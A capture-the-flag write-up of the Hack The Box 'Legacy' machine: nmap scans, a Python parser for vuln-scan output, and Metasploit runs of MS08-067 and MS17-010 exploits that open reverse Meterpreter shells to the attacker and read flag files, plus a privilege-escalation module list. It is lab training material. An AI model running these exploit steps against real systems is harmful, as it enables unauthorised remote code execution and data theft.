Legacy
Ports scan
root@kali:~# nmap -A -T4 -v legacy

Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-13 22:48 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 22:48
Completed NSE at 22:48, 0.00s elapsed
Initiating NSE at 22:48
Completed NSE at 22:48, 0.00s elapsed
Initiating NSE at 22:48
Completed NSE at 22:48, 0.00s elapsed
Initiating Ping Scan at 22:48
Scanning legacy (10.10.10.4) [4 ports]
Completed Ping Scan at 22:48, 0.09s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 22:48
Scanning legacy (10.10.10.4) [1000 ports]
Discovered open port 445/tcp on 10.10.10.4
Discovered open port 139/tcp on 10.10.10.4
Completed SYN Stealth Scan at 22:48, 4.70s elapsed (1000 total ports)
Initiating Service scan at 22:48
Scanning 2 services on legacy (10.10.10.4)
Completed Service scan at 22:49, 6.19s elapsed (2 services on 1 host)
Initiating OS detection (try #1) against legacy (10.10.10.4)
Retrying OS detection (try #2) against legacy (10.10.10.4)
Initiating Traceroute at 22:49
Completed Traceroute at 22:49, 0.09s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 22:49
Completed Parallel DNS resolution of 2 hosts. at 22:49, 0.24s elapsed
NSE: Script scanning 10.10.10.4.
Initiating NSE at 22:49
Completed NSE at 22:49, 50.83s elapsed
Initiating NSE at 22:49
Completed NSE at 22:49, 0.00s elapsed
Initiating NSE at 22:49
Completed NSE at 22:49, 0.00s elapsed
Nmap scan report for legacy (10.10.10.4)
Host is up (0.044s latency).
rDNS record for 10.10.10.4: legacy.htb
Not shown: 997 filtered ports
PORT     STATE  SERVICE        VERSION
139/tcp  open   netbios-ssn    Microsoft Windows netbios-ssn
445/tcp  open   microsoft-ds   Windows XP microsoft-ds
3389/tcp closed ms-wbt-server
Device type: general purpose|specialized
Running (JUST GUESSING): Microsoft Windows XP|2003|2000|2008 (92%), General Dynamics embedded (87%)
OS CPE: cpe:/o:microsoft:windows_xp cpe:/o:microsoft:windows_server_2003 cpe:/o:microsoft:windows_2000::sp4 cpe:/o:microsoft:windows_server_2008::sp2
Aggressive OS guesses: Microsoft Windows XP SP2 or Windows Small Business Server 2003 (92%), Microsoft Windows 2000 SP4 or Windows XP SP2 or SP3 (92%), Microsoft Windows XP SP2 (92%), Microsoft Windows Server 2003 (90%), Microsoft Windows XP SP3 (90%), Microsoft Windows 2000 SP4 (90%), Microsoft Windows XP Professional SP3 (90%), Microsoft Windows XP SP2 or SP3 (90%), Microsoft Windows XP Professional SP2 (90%), Microsoft Windows XP SP2 or Windows Server 2003 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=260 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows XP; CPE: cpe:/o:microsoft:windows, cpe:/o:microsoft:windows_xp

Host script results:
|_clock-skew: mean: -4h00m01s, deviation: 1h24m50s, median: -5h00m01s
| nbstat: NetBIOS name: LEGACY, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:83:b6 (VMware)
| Names:
|   LEGACY<00>           Flags: <unique><active>
|   HTB<00>              Flags: <group><active>
|   LEGACY<20>           Flags: <unique><active>
|   HTB<1e>              Flags: <group><active>
|   HTB<1d>              Flags: <unique><active>
|_  \x01\x02__MSBROWSE__\x02<01>  Flags: <group><active>
| smb-os-discovery:
|   OS: Windows XP (Windows 2000 LAN Manager)
|   OS CPE: cpe:/o:microsoft:windows_xp::-
|   Computer name: legacy
|   NetBIOS computer name: LEGACY\x00
|   Workgroup: HTB\x00
|_  System time: 2019-11-14T02:49:04+02:00
| smb-security-mode:
|   account_used: guest
|   authentication_level: user
|   challenge_response: supported
|_  message_signing: disabled (dangerous, but default)
|_smb2-time: Protocol negotiation failed (SMB2)

TRACEROUTE (using port 3389/tcp)
HOP RTT      ADDRESS
1   86.68 ms 10.10.14.1
2   43.89 ms legacy.htb (10.10.10.4)

NSE: Script Post-scanning.
Initiating NSE at 22:49
Completed NSE at 22:49, 0.00s elapsed
Initiating NSE at 22:49
Completed NSE at 22:49, 0.00s elapsed
Initiating NSE at 22:49
Completed NSE at 22:49, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.49 seconds
           Raw packets sent: 2070 (94.476KB) | Rcvd: 42 (2.508KB)

Only SMB is exposed (139 and 445 open, 3389 closed). The service banner and smb-os-discovery agree on Windows XP, SMB2 negotiation fails so the host speaks SMBv1 only, a guest session is accepted and message signing is disabled. That profile points straight at the SMB vulnerability scripts.
Vulnerability scan
root@nmapgit:~# nmap -p139,445 --script vuln legacy

Starting Nmap 7.80SVN ( https://nmap.org ) at 2019-11-14 04:03 UTC
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for legacy (10.10.10.4)
Host is up (0.045s latency).

PORT    STATE SERVICE
139/tcp open  netbios-ssn
445/tcp open  microsoft-ds

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|           The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
|           Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
|           code via a crafted RPC request that triggers the overflow during path canonicalization.
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143

Nmap done: 1 IP address (1 host up) scanned in 48.97 seconds
Nmap finds two vulnerabilities on this host: MS08-067 (CVE-2008-4250), a stack overflow in the Server service reachable over SMB, and MS17-010 (CVE-2017-0143), the SMBv1 bug behind EternalBlue and WannaCry. Both are unauthenticated remote code execution in a service that runs as SYSTEM, so either one gives the user and root flags in a single step; the two sections below take each in turn. Note that smb-vuln-ms10-061 errored out and samba-vuln-cve-2012-1182 was refused access, so those two results are inconclusive rather than negative.
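Reading a `--script vuln` report by eye is fine for one host, but the distinction just made (vulnerable versus false versus error versus access denied) is worth automating when the scan covers a subnet. The parser below is an added example written for this write-up, not code from nmap or from the original author; it works on the plain-text output shown above (not nmap's XML), and the SAMPLE string is constructed from that output, trimmed.

```python
"""Triage the NSE blocks of an `nmap --script vuln` text report (added example, not nmap's code)."""
import re
from dataclasses import dataclass, field

# Constructed sample: the scan of legacy (10.10.10.4) above, trimmed.
SAMPLE = """\
Pre-scan script results:
| broadcast-avahi-dos:
|   Discovered hosts:
|     224.0.0.251
|   After NULL UDP avahi packet DoS (CVE-2011-1002).
|_  Hosts are all up (not vulnerable).
Nmap scan report for legacy (10.10.10.4)
Host is up (0.045s latency).

Host script results:
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms08-067:
|   VULNERABLE:
|   Microsoft Windows system vulnerable to remote code execution (MS08-067)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2008-4250
|
|     Disclosure date: 2008-10-23
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_      https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: ERROR: Script execution failed (use -d to debug)
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
"""

NSE_PREFIX = re.compile(r"^\|[_ ]?")      # "| ", "|_" or a bare "|" spacer line
STATE_RE = re.compile(r"^State:\s*(LIKELY\s+)?VULNERABLE", re.I)
CVE_RE = re.compile(r"CVE-\d{4}-\d{4,}")  # upper-case only, so script names like samba-vuln-cve-... do not match
URL_RE = re.compile(r"https?://\S+")


@dataclass
class Finding:
    script: str
    state: str        # VULNERABLE | NOT VULNERABLE | ERROR | INCONCLUSIVE
    summary: str = ""
    cves: list = field(default_factory=list)
    refs: list = field(default_factory=list)


def _script_blocks(text: str) -> list:
    """Group NSE lines by script: a column-0 line starts a script, indented lines continue it."""
    blocks = []
    for raw in text.splitlines():
        if not raw.startswith("|"):
            continue                      # banners, port table, timing: not NSE output
        line = NSE_PREFIX.sub("", raw, count=1)
        if not line.strip():
            continue                      # blank "|" spacer inside a block
        if not line.startswith(" "):
            name, _, rest = line.partition(":")
            blocks.append((name.strip(), [rest.strip()] if rest.strip() else []))
        elif blocks:
            blocks[-1][1].append(line.strip())
    return blocks


def parse_vuln_scan(text: str) -> list:
    findings = []
    for name, lines in _script_blocks(text):
        joined = " ".join(lines)
        if lines and lines[0].startswith("ERROR"):
            state = "ERROR"               # the check itself failed; says nothing about the host
        elif (lines and lines[0].lower() == "false") or "not vulnerable" in joined.lower():
            state = "NOT VULNERABLE"
        elif (lines and lines[0] == "VULNERABLE:") or any(STATE_RE.match(l) for l in lines):
            state = "VULNERABLE"
        else:
            state = "INCONCLUSIVE"        # e.g. NT_STATUS_ACCESS_DENIED: retest with credentials, do not record a negative
        summary = lines[1] if state == "VULNERABLE" and len(lines) > 1 else (lines[0] if lines else "")
        findings.append(Finding(name, state, summary,
                                list(dict.fromkeys(CVE_RE.findall(joined))),
                                list(dict.fromkeys(URL_RE.findall(joined)))))
    return findings


def vulnerable(findings: list) -> list:
    return [f for f in findings if f.state == "VULNERABLE"]


def needs_manual_check(findings: list) -> list:
    return [f for f in findings if f.state in ("ERROR", "INCONCLUSIVE")]


if __name__ == "__main__":
    for f in parse_vuln_scan(SAMPLE):
        print(f"{f.state:<15} {f.script:<28} {' '.join(f.cves)}")
```

Two details matter in practice: a CVE identifier in a block does not mean the host is vulnerable (broadcast-avahi-dos cites CVE-2011-1002 and then reports not vulnerable), and an error or access-denied result goes into a separate retest list instead of being counted as clean.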
MS08-067
searchsploit results
root@kali:~/HTB/Machines/Legacy# searchsploit MS08-067
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft Windows - 'NetAPI32.dll' Cod | exploits/windows/remote/40279.py
Microsoft Windows Server - Code Execut | exploits/windows/dos/6824.txt
Microsoft Windows Server - Code Execut | exploits/windows/remote/7104.c
Microsoft Windows Server - Service Rel | exploits/windows/remote/16362.rb
Microsoft Windows Server - Universal C | exploits/windows/remote/6841.txt
Microsoft Windows Server 2000/2003 - C | exploits/windows/remote/7132.py
--------------------------------------- ----------------------------------------
Shellcodes: No Result
-------------------------------- -----------------------------------------------
 Paper Title                    |  Path
                                | (/usr/share/exploitdb-papers/)
-------------------------------- -----------------------------------------------
How Conficker makes use of MS08 | docs/english/12934-how-conficker-makes-use-of-
-------------------------------- -----------------------------------------------
Metasploit
The module's check is worth running before exploit: MS08-067 corrupts the stack of the Server service, and with the wrong target profile it crashes the service instead of returning a shell, taking SMB (and this attack path) down until the box is rebooted.

root@kali:~/HTB/Machines/Legacy# msfconsole
msf5 > search MS08-067

Matching Modules
================

   #  Name                                 Disclosure Date  Rank   Check  Description
   -  ----                                 ---------------  ----   -----  -----------
   0  exploit/windows/smb/ms08_067_netapi  2008-10-28       great  Yes    MS08-067 Microsoft Server Service Relative Path Stack Corruption

msf5 > use exploit/windows/smb/ms08_067_netapi
msf5 exploit(windows/smb/ms08_067_netapi) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 exploit(windows/smb/ms08_067_netapi) > check
[+] 10.10.10.4:445 - The target is vulnerable.
msf5 exploit(windows/smb/ms08_067_netapi) > exploit

[*] Started reverse TCP handler on 10.10.14.34:4444
[*] 10.10.10.4:445 - Automatically detecting the target...
[*] 10.10.10.4:445 - Fingerprint: Windows XP - Service Pack 3 - lang:English
[*] 10.10.10.4:445 - Selected Target: Windows XP SP3 English (AlwaysOn NX)
[*] 10.10.10.4:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.4:1028) at 2019-11-13 23:44:10 -0500
User flag
meterpreter > pwd
C:\WINDOWS\system32
meterpreter > cd ..
meterpreter > cd ..
meterpreter > cd Documents\ and\ Settings
meterpreter > dir
Listing: C:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-03-16 02:07:20 -0400  Administrator
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  All Users
40777/rwxrwxrwx  0     dir   2017-03-16 01:20:29 -0400  Default User
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:52 -0400  LocalService
40777/rwxrwxrwx  0     dir   2017-03-16 01:32:42 -0400  NetworkService
40777/rwxrwxrwx  0     dir   2017-03-16 01:33:41 -0400  john

meterpreter > cd john
meterpreter > cd Desktop
meterpreter > cat user.txt
<USER FLAG>
Root flag
meterpreter > cd ..
meterpreter > cd ..
meterpreter > cd Administrator
meterpreter > cd Desktop
meterpreter > cat root.txt
Check for other vulnerabilities
The MS08-067 session already reads the Administrator desktop, so no privilege escalation is needed here; the suggester is run only to record what else this unpatched XP SP3 build exposes. "The target appears to be vulnerable" means the module's check passed; "The service is running, but could not be validated" means the affected component is present but the module could not confirm the vulnerability from inside the session.

meterpreter > bg
[*] Backgrounding session 1...
msf5 exploit(windows/smb/ms08_067_netapi) > use multi/recon/local_exploit_suggester
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > set SHOWDESCRIPTION true
SHOWDESCRIPTION => true
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.4 - Collecting local exploits for x86/windows...
[*] 10.10.10.4 - 29 exploit checks are being tried...
[+] 10.10.10.4 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
  This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated then the exploit will not run. The module relies on kitrap0d.x86.dll, and is not supported on x64 editions of Windows.
[+] 10.10.10.4 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
  This module exploits a NULL Pointer Dereference in win32k.sys, the vulnerability can be triggered through the use of TrackPopupMenu. Under special conditions, the NULL pointer dereference can be abused on xxxSendMessageTimeout to achieve arbitrary code execution. This module has been tested successfully on Windows XP SP3, Windows 2003 SP2, Windows 7 SP1 and Windows 2008 32bits. Also on Windows 7 SP1 and Windows 2008 R2 SP1 64 bits.
[+] 10.10.10.4 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
  This module exploits improper object handling in the win32k.sys kernel mode driver. This module has been tested on vulnerable builds of Windows 7 x64 and x86, and Windows 2008 R2 SP1 x64.
[+] 10.10.10.4 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
  This module exploits the vulnerability in mrxdav.sys described by MS16-016. The module will spawn a process on the target system and elevate its privileges to NT AUTHORITY\SYSTEM before executing the specified payload within the context of the elevated process.
[+] 10.10.10.4 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
  This module exploits the lack of sanitization of standard handles in Windows' Secondary Logon Service. The vulnerability is known to affect versions of Windows 7-10 and 2k8-2k12 32 and 64 bit. This module will only work against those versions of Windows with Powershell 2.0 or later and systems with two or more CPU cores.
[+] 10.10.10.4 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
  Module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. Currently the module does not spawn as SYSTEM, however once achieving a shell, one can easily use incognito to impersonate the token.
[+] 10.10.10.4 - exploit/windows/local/ms16_075_reflection_juicy: The target appears to be vulnerable.
  This module utilizes the Net-NTLMv2 reflection between DCOM/RPC to achieve a SYSTEM handle for elevation of privilege. It requires a CLSID string.
[+] 10.10.10.4 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
  This module exploits a vulnerability on EPATHOBJ::pprFlattenRec due to the usage of uninitialized data which allows to corrupt memory. At the moment, the module has been tested successfully on Windows XP SP3, Windows 2003 SP1, and Windows 7 SP1.
[*] Post module execution completed
MS17-010
searchsploit results
root@kali:~/HTB/Machines/Legacy# searchsploit ms17-010
--------------------------------------- ----------------------------------------
 Exploit Title                         |  Path
                                       | (/usr/share/exploitdb/)
--------------------------------------- ----------------------------------------
Microsoft Windows - 'EternalRomance'/' | exploits/windows/remote/43970.rb
Microsoft Windows - SMB Remote Code Ex | exploits/windows/dos/41891.rb
Microsoft Windows 7/2008 R2 - 'Eternal | exploits/windows/remote/42031.py
Microsoft Windows 7/8.1/2008 R2/2012 R | exploits/windows/remote/42315.py
Microsoft Windows 8/8.1/2012 R2 (x64)  | exploits/windows_x86-64/remote/42030.py
Microsoft Windows Server 2008 R2 (x64) | exploits/windows_x86-64/remote/41987.py
--------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result
Metasploit
Of the modules listed, exploit/windows/smb/ms17_010_psexec is the one to use against Windows XP: its EternalRomance/EternalSynergy/EternalChampion transaction techniques work on XP and 2003, whereas ms17_010_eternalblue targets Windows 7 and Server 2008 R2 and, being a kernel pool corruption, is the more likely to blue-screen the host. The module's own check confirms the target before anything is fired.

root@kali:~/HTB/Machines/Legacy# msfconsole
msf5 > search ms17-010

Matching Modules
================

   #  Name                                           Disclosure Date  Rank     Check  Description
   -  ----                                           ---------------  ----     -----  -----------
   0  auxiliary/admin/smb/ms17_010_command           2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
   1  auxiliary/scanner/smb/smb_ms17_010                              normal   Yes    MS17-010 SMB RCE Detection
   2  exploit/windows/smb/doublepulsar_rce           2017-04-14       great    Yes    DOUBLEPULSAR Payload Execution and Neutralization
   3  exploit/windows/smb/ms17_010_eternalblue       2017-03-14       average  Yes    MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
   4  exploit/windows/smb/ms17_010_eternalblue_win8  2017-03-14       average  No     MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
   5  exploit/windows/smb/ms17_010_psexec            2017-03-14       normal   Yes    MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution

msf5 > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 10.10.10.4
RHOSTS => 10.10.10.4
msf5 exploit(windows/smb/ms17_010_psexec) > check
[+] 10.10.10.4:445 - Host is likely VULNERABLE to MS17-010! - Windows 5.1
[+] 10.10.10.4:445 - The target is vulnerable.
msf5 exploit(windows/smb/ms17_010_psexec) > exploit

[*] Started reverse TCP handler on 10.10.14.34:4444
[*] 10.10.10.4:445 - Target OS: Windows 5.1
[*] 10.10.10.4:445 - Filling barrel with fish... done
[*] 10.10.10.4:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 10.10.10.4:445 -  [*] Preparing dynamite...
[*] 10.10.10.4:445 -   [*] Trying stick 1 (x86)...Boom!
[*] 10.10.10.4:445 -  [+] Successfully Leaked Transaction!
[*] 10.10.10.4:445 -  [+] Successfully caught Fish-in-a-barrel
[*] 10.10.10.4:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 10.10.10.4:445 - Reading from CONNECTION struct at: 0x8232c760
[*] 10.10.10.4:445 - Built a write-what-where primitive...
[+] 10.10.10.4:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.4:445 - Selecting native target
[*] 10.10.10.4:445 - Uploading payload... iKpAkaEE.exe
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] Meterpreter session 1 opened (10.10.14.34:4444 -> 10.10.10.4:1029) at 2019-11-14 00:10:37 -0500
[*] 10.10.10.4:445 - Created \iKpAkaEE.exe...
[+] 10.10.10.4:445 - Service started successfully...
[*] Sending stage (180291 bytes) to 10.10.10.4
[*] 10.10.10.4:445 - Deleting \iKpAkaEE.exe...

meterpreter > pwd
C:\Documents and Settings\Administrator\Desktop
meterpreter > cat root.txt
<ROOT FLAG>

Note the footprint: unlike the in-memory MS08-067 path, ms17_010_psexec writes a randomly named executable to the target, registers and starts it as a service, then deletes the file. The file is gone, but the service creation and start remain in the System event log for a defender to find.
References
Daniel Simao 22:42, 13 November 2019 (EST)